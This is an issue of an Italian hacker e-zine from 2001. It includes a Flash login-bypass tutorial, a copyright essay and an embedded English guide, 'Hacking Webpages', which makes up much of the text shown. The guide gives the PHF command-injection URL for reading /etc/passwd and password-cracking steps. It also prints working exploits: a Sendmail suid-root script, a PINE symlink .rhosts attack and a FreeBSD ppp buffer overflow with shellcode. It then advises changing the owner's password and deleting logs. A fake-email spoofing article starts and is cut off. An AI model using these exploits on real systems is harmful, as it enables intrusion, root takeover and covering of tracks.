/ D . i . r . t . y . N . e . t / /n° 4 / Rivista mensile/bimensile gratis sulla sicurezza numero "4" Aprile/Maggio 2001 /Tutti i testi sono sottoposti ad adattamento - sYn / /Inizio Disclaimer / Tutto il contenuto di questo file di testo è da ritenersi dannoso quindi non applicabile. L'utente è pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le norme l'utente avrà commesso azione illegale. In questo testo è solamente presente INFORMAZIONE, e l'informazione per legge è LEGALE. Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella questo file. /Fine Disclaimer / / website / http://www.hackersat.com /email / sYn - syn@hackersat.com A[v]a[t]A[r] - avatar@hackersat.com Jrash - jrash@hackersat.com Ghent - ghent@hackersat.com phaet - vesa8_34@yahoo.it Screenet_it - screener_it@freemail.it kEwL - kewl@penguinpowered.com /ascii / sYn /staff assemblo / sYn - A[v]a[t]A[r] /===========================::=============================::=================/ / /Indice /Allegati / / /===========================::=============================::=================/ /800x600 standard full screen / Indice Titolo Autore /Intro / /Hacking (or coding) / Flash hacking 1 - Ghent Copyright Digitale - Mr.A Hacking webpages - Virtual Circuit & Psychotic Semplice fake e-mail - sYn Costruire un bunker linux: Firewalling di base - kEwL /Hacking satellitare / Inserimento Zener - sYn /Mezzing / Modifica alla Scarabeo (Aprilia) - Jrash L'inseguimento - Jrash /Phreaking / Italian freching - A[v]a[t]A[r] /Narcoting / Maria consigli e oltre - phaet /Illegality / Come impallare la scuola - sYn /Miscellanea / Shell for lamah - Jrash Test d'inteliggenza! - sYn /art1 / L'approccio in rete e more... - sYn Carnivore Diagnostic Tool - Screener_it Imapd exploit - SPYRO /Outro / Allegati - cartella "=attc=" gh.zip : file compresso contenete materiale prodotto da Ghent; hackerami.swf, pwdgate.fla. Vedi articolo. reti.zip : file compresso contenente un file di testo inviato da Ulisses1 for Dn. LINUS BIN.zip : mitico. Dopo averlo trovato è qui per voi il LINUS BIN MANAGER Ver 3.0. .....finito il testo. Puoi pubblicare Dn4. (ore 4:30, ultime parole di kEwL a sYn!) /===========================::=============================::=================/ / /Intro / sYn / /===========================::=============================::=================/ Salve ragazzi, finalmente ce la ho fatta! Il mese di Aprile (dolce dormire) è stato abbastanza stressante da impedirmi di assemblare al meglio il quarto numero della rivista. Di impegni sono stato colmo e stracolmo. La mia schifosissima scuola mi ha tenuto impegnato per la costruzione di un sito personale e fetente! Per la rete ho vagato e vagato senza concludere quasi niente, ma in conpenso mi sono tolto il lusso di fare delle belle chattate interessanti! Ogni cosa che facevo, portavo a termine sembrava non conclusa; nella testa mi girava di tutto; colpa dei miei pensieri che tenevano impegnata perfino la mia mente! Alcune persone in rete che cercavo non sono riuscite a trovarle...ma adesso voi penserete su cosa ve ne possa fregare delle mie faccende. Io ve le sto solo citanto dimostrandovi in che stato ho collaborato. Aspettando le feste di Pasqua , che di sicuro non mi procureranno molto tempo libero, sto mettendo a posto un po' di documenti. Ne approfitto per dirvi che tutti voi potete apportare una piccola collaborazione scrivendomi e dicendo tutti i lati negativi che hanno riscontrato. Approposito di email, volevo dirvi una cosa importante: mi SCUSO con tutte le persone che mi hanno scritto a cui non ho potuto rispondere, data la notevole quantita' di email che mi stanno arrivando probabilmente nel prossimo numero della rivista sara' inserita una box mail con le vostre domande postemi..! Per ora pero' è solo un'idea. Mentre vi sto scrivendo sono appena le 10 pm. Improvvisamente mi è venuta una voglia pazzesca di suonare un po' con una piccola tab appena scaricata da Olga (www.olga.net). Raga dato che non so proprio cosa cavolo dirvi vi faccio ridere un po' (o almeno spero:). Vi riporto un po' di cazzate che facevamo io e i miei amici in classe vi va? Ho sentito un Si. Xchè? Mi sono trovato il diario a 20 centimetri di distanza così ho detto di leggere cosa scrivevo nelle ore "morte". Bene iniziamo: I libri che DOVEVO leggere Verga - I Malavoglia (infatti la voglia non mio venne proprio!) Verga - MatroDongesulado (un nome + piccolo?) Fogazzaro - Piccolo mondo antico (li sa' solo la prof. questi...) D'Annunzio - Il piacere (ua lo ricordo...sembra strano ma mi sembra che mia mumy lo aveva letto...) Pirandello - Il fu Mattia Pascal (un mito..Mattia ???) Pirandello - Sei personaggi in cerca di autore (Lo faccio io, li pubblico anche!!) All'1 settembre mi trovo uno skizzo di una sottospecie di cono, con sotto scritto "Sconto del 75% alla cassa!"....cosa ma ha pensato la mia mente? ...Tutti cercano amici ma nessuno si preoccupa di esserlo!...Bella questa chissa' che me la ha scritta. ...skizzi a non finire...(quando non portavo i fogli bianchi, praticamente sempre... ...20:30 Matrix su tele+ ( mi so' segnato anche quando lo facevano...ma Matrix? Chi me lo ha scritto? ) ...Comleanno di Nadia...chi se ne frega!... ...portare Dante... ...portare 10.000 £ ...alla faccio che li vado' a scava' i soldi ? ...tag a non finire... ...assemblea... (ma è il mio diario? a sisi è mio...) ...Anche se so che non te ne frega niente, io te lo dico lo stesso: oggi è il mio compleanno e compio ben 19 anni...questa ragazza mi conosceva bene bene!!! ...Pluto: strudiare l'aulularia (ero fatto mentre scrivevo...) ...(Qui c'è una pagina piena di firme uguali a quelle di mia madre...erano i miei provini!!!) ...Verso la fine sta scritto "E' finita" . MAGARI dicevo ogni volta che la scrutavo. Prima di lasciarvi volevo ringraziare in particolare phaet e Ghent che hanno fornito davvero dei bei art. Mi raccomando...non provate a votare BERLUSCONI !!!!! (lo so non c'entra niente..) Basta ragazzi. Mi è venuta una fitta allo stomaco. Forse è meglio che la finisco....a prop... Buona lettura! /===========================::=============================::=================/ / /Flash hacking 1 / Ghent / /===========================::=============================::=================/ ___________________________________ ##°°°°°°° FLASH HACKING 1°°°°°°° ## ## Banale Hack di Login in Flash ## ##~~~~~~~~~~ allegati: ~~~~~~~~~~## ## pwdgate.fla - hackerami.swf ## °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Allora, saluti a tutti: si parte con il primo di una (spero) serie di articoli aventi come tema usi un po' "particolari" di Flash e del suo ActionScript. Alcune cose potrebbero risultare incomprensibili a chi non usa Flash con un minimo di dimestichezza, ma d'altro canto sarerebbe assurdo se io mi mettessi a scrivere un corso di Flash: ce ne sono gia' tantissimi, e sicuramente scritti da gente piu' esperta di me. Un paio di link? www.html.it, ed il supremo, incommensurabile (ma in inglese) www.flashkit.com. Ci tengo a dire che è il primo articolo per questa e-zine del tutto "mio", niente traduzioni o "cose del genere"... ;) Allora... partiamo. Un trucchetto veloce veloce. Se vi trovate davanti ad un login di un sito in Flash, ed il webmaster è un niubbo fetente :), potrebbe aver protetto una sezione o cos'altro semplicemente con un banale actionscript del genere (metto i commenti per chi non conosce il mio amato actionscript di Flash) *** //(Azioni associate ad un ipotetico bottone "Ok" di login) on (release) { //all'evento release (il rilascio del clic) if (password=="pippo") { //se la variabile password (che sara' un textfield) //è uguale alla stringa "pippo" gotoAndStop (10); //vai al fotogramma 10 (dove ci sara' la parte protetta) } else { //altrimenti nextFrame (); //vai al fotogramma successivo //(dove ci sara' un messaggio di errore) } } *** Bene, direte voi... ma io come faccio a sapere qual è lo script associato al bottone? Dovrei avere il sorgente, il .fla... non l'swf "compilato" che vedo nel browser... ...ed invece no, nessun problema. Esistono dei programmi per estrarre il codice anche dagli swf o che li sproteggono dalla modifica (un settaggio del publish di Flash consente di proteggere gli swf dall'importazione), ma noi non avremo bisogno neanche di questo... (e poi io non ne ho nessuno! Mica scopiazzo, io... sono un designer serio! :P) Infatti, ed ho provato hackerando un mio stesso filmato, basta aprire gli swf con un hex editor per vedere una buona parte degli script contenuti, se non tutti (non mi sono mica messo a confrontare!) ehehe, avrete ben capito che non ci vuole molto a trovare l'action che ci interessa, probabilmente bastera' cercare "pwd", "pass" "login" e cose del genere con l'hex editor... Altro trucco molto semplice: molti niubbi si dimenticando del "play" che compare cliccando col tasto destro quando si sta visualizzando un .swf : questo comando manda avanti il movie con una action "play()", e questo puo' essere determinante in caso di accesso ad una zona protetta: mi spiego meglio. Ipotizziamo che ci sia il primo fotogramma del movie con il login, il secondo fotogramma con un messaggio di errore per avvertire che il login non è valido, ed il terzo fotogramma con la parte "accesso ristretto". Bene, su ogni fotogramma c'è una action "stop()", che praticamente ferma il movie fotogramma per fotogramma. Ipotizziamo che all'"Ok" del login ci siano queste azioni: *** on (release) { //all'evento release (il rilascio del clic) if (password=="vivaledonne") { //se la variabile password (che sara' un textfield) //è uguale alla stringa "vivaledonne" gotoAndStop (2); //vai al fotogramma 3 (la parte protetta) } else { //altrimenti nextFrame (); //vai al fotogramma successivo //(dove ci sara' un messaggio di errore) } } *** Ora, c'è una grossa falla in questo login: Nel nel frame del messaggio di errore, c'è solo uno Stop che impedisce di andare avanti ed accedere alla parte protetta... in pratica sbagliando la pwd si ariva al fotogramma 2, ed il movie si ferma. Ma basta un right-click, e la scelta di "play" (o "riproduci" nella versione italiana del plugin) per avviare nuovamente il movie, che andra al fotogramma 3! :) Banale, eh? Per evitare questo giochetto, basta spostare il fotogramma "protetto" dalla posizione 3 alla 4 o magari alla 5, proprio per stare sicuri, ed assegnare ai fotogrammi vuoti tra quello del messaggio d'errore e quello della parte protetta (il 3, o il 3 ed il 4 se si è spostato il frame da proteggere nella posizione 5) l'azione gotoAndPlay (1); in modo tale che si venga portati al primo fotogramma del movie se si prova a mandare in play oltre il secondo fotogramma. In pratica, si otterra': Fotogramma 1 - login frame actions: stop(); - textfield di input con assegnata variabile "password" - bottone di ok azioni bottone: on (release) { if (password=="vivaledonne") { gotoAndStop (5); } else { nextFrame (); } } Fotogramma 2 - messaggio di errore frame actions: stop(); - textfield statico contenente messaggio di errore - bottone per tornare al primo fotogramma, che azzera anche la var "password" azioni bottone: on (release) { password = ""; gotoAndPlay (1); } Fotogramma 3 - anti/bypass del login frame actions: gotoAndPlay (1); Fotogramma 4 - anti/bypass scaramantico del login frame actions: gotoAndPlay (1); Fotogramma 5 - Area protetta Spero di essere stato chiaro, ma sono sicuro che tutto cio' e' apparso banalissimo a chi usa Flash. In allegato il file hackerami.swf, come compito a casa :) Ho cercato di rendere difficilmente individuabile la pwd, per quanto possibile senza criptarla con le funzioni che sto facendo (prossimo numero della ezine ;)? ), ma sono sicuro che la troverete facilmente, riuscendo cosi' a leggere il messaggio protetto da pwd...ehehe, curiosi? In caso non ci riusciste, o se vi servono chiarimenti/consigli, vi ricordo la mia email: ghent@hackersat.com (naturalmente sapete che dovete aprire l'swf col browser, no? E che ovviamente dovete avere il plugin di Flash installato? :)) Ok, ora che abbiamo visto come sfruttare questo paio di trucchetti per eventuali nostre necessita', vediamo invece come preparare un login *sicuro* in Flash. Il punto debole è che le stringhe delle pwd vengono riportate in chiaro nell'swf, quindi noi faremo in modo che queste NON ci siano.... Come? Semplice, usando uno script server side, il quale non viene eseguito in locale come accade invece coll'swf di Flash. Direte voi, grazie al kaiser... ma chi li conosce ASP, PHP o C... chi è capace di preparare un CGI che possa comunicare con Flash? O ancora, anche volendo imparare a fare qualcosa del genere, chi è che mi compra uno spazio FTP che mi consenta di usare script server side? E' difficile trovare uno spazio free che lo permetta (se ne conoscete di affidabili, di corsa a comunicarmeli a ghent@hackersat.com :)). Beh, io non sono capace di fare un CGI in Perl ne' ho comprato spazio, ma alla fine 'sto login l'ho fatto decentemente. Mi sono appoggiato alla "password gate" di BraveNet, (www.bravenet.com), ottimo sito che offre numerosi servizi free per webmaster. In pratica, dopo aver sottoscritto a Bravenet, attivato e configurato la password gate (operazioni banalissime sulle quali non mi vado a dilungare), viene dato un frammento di codice da inserire nella propria pagina web per far apparire la form di login. Dico, ma noi siamo gente che incolla frammenti di codice senza capire cosa fanno, lasciando l'orrendo design standard del login di BraveNet a rovinarci lo stile del sito? CERTO che no! :) Login in Flash si è detto, login in Flash sara', Ghent ha parlato! (sono leciti i "chissenefrega" :)) Andiamo a vedere un esempio di codice fornito da Bravenet per la password gate... ***
Enter Password Protected Area
User Name:  
Password:  
    
*** bene, in pratica, sintetizzando un po' e sperando che capiate almeno un poko poko di HTML, si tratta di un form con due campi testo visibili, user e password, e altri campi nascosti (quelli settati con HIDDEN). Come form action c'è il sending in POST di queste variabili dei campi testo, nascosti o meno che siano, alla pagina "http://pub41.bravenet.com/passwd/show.php" che è in pratica l'indirizzo della pagina PHP che si occupa di verificare se il login mandato (i valori user/pwd immessi nei campi testo visibili) sono validi per l'accesso ad una determinata pagina che noi avremo settato nella members area di Bravenet. Inoltre, c'è un po' di monnezza che non ci interessa: il logo di BraveNet, la centratura, i colori ed i font. In pratica le righe chiave sono queste: ***
*** In teoria, ho pensato io, se faccio mandare queste variabili da Flash e non da HTML, che se ne frega BraveNet? Ed infatti, per fortuna, è andata cosi' :) E' bastato preparare un clip di login coi campi testo user/password, per poi settare delle variabili interne destinate a essere mandate alla pagina PHP di bravenet alla pressione di un bottone... Funziona perfettamente... :)) Ecco il codice associato al bottone "OK" contenuto nel movieclip "login", che contiene a sua volta i campi di input text login/password e le variabili di cui sopra. //inizio codice on (release) { uname = _root.loginclip:userid; passwd = _root.loginclip:password; usernum ="1234567890" //vostro identificativo Bravenet cpv = "1" //ehm, non lo so :))) getURL ("http://pub41.bravenet.com/passwd/show.php", "_top", "POST"); } //fine codice E ora mi direte... "ebbravo, funziona... ma che schifo! La barra di pubblicita' che mi piazza BraveNet in un frame inferiore è enorme!" Tsk tsk, nessun problema: basta impostare come pagina di destinazione della gate, dall'area di manutenzione di BraveNet, non la pagina che volete proteggere ma un banalissimo documento html di redirect, cosi' preparato: REDIRECT Semplice, no? Appena caricata la pagina (Body Onload) la funzione Redirect porta alla pagina che noi si voleva proteggere... importante è il target "_top", che mostra la pagina a tutto schermo, elimando eventuali frames (e quindi anche la barra di BraveNet). Vi assicuro che non fa neanche in tempo ad apparire... cmq vi invito, come faccio sempre io, a "rendere omaggio" a BraveNet per i suoi servizi applicando il bannerino "Proud Member of BraveNet" sulla homepage... il loro codice standard rovina il design e quindi si manipola a proprio piacimento, ma un po' di pubblicita' in segno di graditudine è il caso di fargliela. Ho preferito lavorare in un moviclip a se' stante e non sulla root del movie per fare in modo che il clip possa essere facilmente inserito ovunque da chiunque, una volta modificato... Potete vedere un esempio di realizzazione pratica nel pwdgate.fla allegato alla ezine, scopiazzatelo liberamente ma soprattutto cercate di capire come funziona... questa cosa del mandare variabili da Flash ha numerosissime applicazioni, fidatevi. Alla prossima, appena ho tempo... speriamo presto... :) []_H@_Team_[] Nothing you can contemplate will ever be the same []#_Ghent_#[] Every second is a new spark, sets the universe aflame [][]=====[][] = Iron Maiden- "The WickerMan" = /===========================::=============================::=================/ / /Copyright Digitale / Mr.A / /===========================::=============================::=================/ PS Norm, sei condannato ad essere messo in CC e a dover leggere l'articolo in anteprima : P -------------------------------------------------------------------------------- Copyright Digitale Una domanda da parecchi mesi rotola in giro per la mia testa senza trovare una risposta soddifacente per quanto butti via una discreta fetta del mio tempo libero nel cercare una soluzione a questo inghippo. La domanda in questione riguarda il significato del copyright in un epoca in cui la copia o la moltiplicazione in serie di ogni tipo di informazione e di ogni genere di documento, quale che sia il suo formato di supporto, è di una semplicità imbarazzante oltre che di una economicità scandalosa. La domanda per la precisione è più di una ed è riassumibile in poche semplici affermazioni. Ha ancora senso al giorno d'oggi la tutela del diritto d'autore? è ancora possibile tutelare in maniera soddisfacente il copyright? Non è forse opportuno rivedere il concetto stesso di diritto d'autore per adattarlo alla mutata situazione del mercato? Alcune considerazioni iniziali possono essere utili per capire quanto la situazione attuale ponga seri proglemi al tentativo di tutelta del diritto d'autore. Il costo attuale di un CD ROM vergine si aggira attorno alle 900 L, quello di un masterizzatore di velocità accettabile attorno alle 300.000 L, giusto per restare nel campo dell'informatica, la loro reperibilità è estremamente alta visto che un masterizzatore è reperibile in qualunque negozio di Hardware ed i CD ROM sono acquistabili addirittura al supermercato. Quindi per chiunque è assolutamente semplice procurarsi i mezzi attraverso i quali la violazione del copyright per il software è possibile.Il costo del software più economico, identificabile con i videogames è ci circa 100.000 L, questo implica che la masterizzazione di 4 videogiochi consente all'utente l'ammortamento della spesa iniziale ed appunto dalla quarta copia inizia per l'appassionato videogiocatore il guadagno.Consideriamo ora invece un altro genere di violazione del copyright che non ha base informatica. E' pratica assai comune tra gli studenti universitari ed anche tra i giocatori di ruolo la fotocopiatura dei testi. in questo caso non si è ancora arrivati ad una semplicità pari a quella delle copie di CD rom, visto che i costi per l'acquisto delle fotocopiatrici è elevato, ed il costo di una singola fotocopia si aggira attorno alle 50-60 lire, e questo implica un costo epr ciascun testo attorno alle 30-40.000 L. Ciononostante questa pratica è ampiamente diffusa visto i costi spropositati di questi testi. In questo campo inoltre si va diffondendo la digitalizzaione dei testi tramite scanner e OCR per rendere piu economica e più facilmente trasmissibile l'informazione. Ultimo e lampante esmpio è quello della diffusione del formato .mp3 per l'audio ed ultimamente del formato divX:-) per il video. Questi due generi di formati consentono una facile trasmissibilità via rete dell'audio e del video e permettono altresì di immagazzinare una quantità immensa di dati in uno "spazio" molto piccolo. Visti quindi tutti questi scenari presenti è abbastanza facile capire che al giorno d'oggi la protezione del diritto d'autore così come è stata finora intesa non solo non è più attuabile ma risulta essere spesso priva di senso. Un'obiezione semplice a questo ragionamente può essere il fatto che comunque per poter avere copie di un informazione è necessario avere almeno un originale, ma spesso questo problema è bypassabile con l'osservazione che molte persone sono disposte a comprare un originale per poi vendere a prezzi modici grandi quantità di copie per mezzo delle quali ottenere sostanziosi guadagni. E' altresì comprensibile l'impossibilità di abolire il diritto d'autore in quanto è necessario per chi dedica tempo alla produzione di un'informazione o comunque di un'opera d'ingegno venga ripagato del suo lavoro; è quindi evidente che deve essere modificata la struttura attuale non solo di leggi e regolamenti ma anche di cultura che vige attorno al concetto di copyright. E' fondamentale poter trovare il giusto punto di equilibrio tra la necessità di gudagano del produttore e la necessità morale della maggior diffusione possibile del prodotto. Sembra essere questa la questione che dovrebbe interessare chi si occupa di copyright, invece le leggi ultimamente licenziate in tutto il mondo vanno verso la repressione della diffuzione dell'informazione nel tentativo di tutelare una serie di privilegi che la tanto nominata globalizzazione e la società dell'informazione hanno già abbattuto alle fondamenta appunto per la stessa loro definizione. E' quindi evidente come l'esistenza in italia ancora di un organismo quale la SIAE che ha il monopolio assoluto sulla gestione del diritto d'autore va contro ogni logica di mercato oltre che di buonsenso. Questa organizzazione si pone lo scopo di tutelare l'autore di un'opera di ingegno e di tutelare l'opera stessa da quella che loro definiscono "pirateria" che altro non è in realtà se non il tentativo di rottura di questo monopolio. La SIAE obbliga chi vuole tutelare i propri diritti a versare una quota di iscrizione, oltre che versare una parte dei guadagni alla SIAE stessa; in cambio di questo l'ente di occupa di andare a cercare le violazioni e di perseguirle, oltre che di riscuotere per conto dell'autore i diritti. In pratica l'ente chiede soldi SIA a chi produce SIA a chi consuma, e obbliga chiunque produce a pubblicare la produzione SOLO se iscritto, infatti in italia è illegale commercializzare libri, CD, cassette, e qualunque altro supporto per informazioni senza il mitico bollino SIAE. Questa forma di protezione poteva avere un senso quando il contatto tra l'autore e il fruitore dell'opera era impossibile o difficoltoso percui l'autore non era in grado materialmente di far valere i suoi diritti direttamente nei confronti dell'utente; allo stato attuale invece avviene esattamente l'opposto, infatti il contatto tra chi produce e chi consuma è altamente facilitato dalla rapidità di trasmissione delle informazioni oltre che dalla rapidità di trasmissione dei mezzi stessi che convogliano le informazioni; non sarebbe quindi affatto difficile acquistare un libro direttamente dall'autore e vederselo spedito a casa entro pochi giorni; questo diminuirebbe i costi, oltre che permettere un maggiore margine di guadagno all'autore e quindi una dimiuizione sostanziosa dei prezzi. Questo non servirebbe sicuramente a "blindare" il diritto d'autore ma aiuterebbe ad una maggiore diffusione di copie "legali". Il modo migliore per eliminare le violazioni del copyright consiste sicuramente nell'autenticazione diretta della copia dopo l'acquisto. Ovvero la copia viene abilitata all'utilizzo mediante un codice unico criptato che viene fornito su richiesta a seguito dell'acquisto, indi per cui se l'abilitazione per la medesima copia viene richiesta più di una volta è possibile anche risalire a colui il quale ha perpetrato la truffa. Questo però va accompagnato sicuramente da una maggiore accessibilità all'informazione che allo stato attuale è considerato bene d'elite e quindi distribuito con parisimonia solo a chi ha i mezzi economici e culturali per procurarselo. In sintesi ritengo che l'abbattimento delle attuali barriere formali e burocratiche, unito ad una facilitazione dell'accesso ai beni sia la strada da perseguire per garantire le necessità di tutti. Mi piacrebbe che da questo articolo scaturisse una seria e meditata discussione sull'argomento in quanto ritengo di non essere riuscito ad andare sufficentemente a fondo nella questione (principalmente in quanto non sono un esperto in materia) e che l'ipotesi da me formulata non sia altro che una delle innumerevoli soluzioni che possono essere poste al problema, e sicuramente non la migliore. Mr.A /===========================::=============================::=================/ / /Hacking webpages / Virtual Circuit and Psychotic /===========================::=============================::=================/ Hacking Webpages The Ultimate Guide By Virtual Circuit and Psychotic Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects. Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file... root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you. The PHF Technique Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it. The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd and that's it! You just sit back and copy the file(if it works). Telnet and Exploits Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It's best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I'm going to list a few below but the list of exploits is endless. This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up: cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi and now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Now that you've gotten root "what's next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible. /===========================::=============================::=================/ / /Semplice fake e-mail! / sYn /===========================::=============================::=================/ Esistono diversi modi per inviare una email con l'indirizzo del mittente falso, questo tipo di e-mail è piu' conosciuta a tutti come fake mail! In questo art vi spiego brevemente un semplice metodo e vi daro' il sorgente di un'interessante programma . Naturalmente come tutti sanno dovremmo sfruttare il servizio SMTP, sono molti i server che lo abilitano e quelli che usano il Sendmail. Al limite potremmo ottenere il root scrivendo proprio a lui facendo finta di essere qualche "illustre" ..ma ormai questo trucco lo usano in pochi...e forse proprio per questo si potrebbe usare...; Passiamo alla pratica. Non dobbiamo fare altro che connetterci alla porta 25 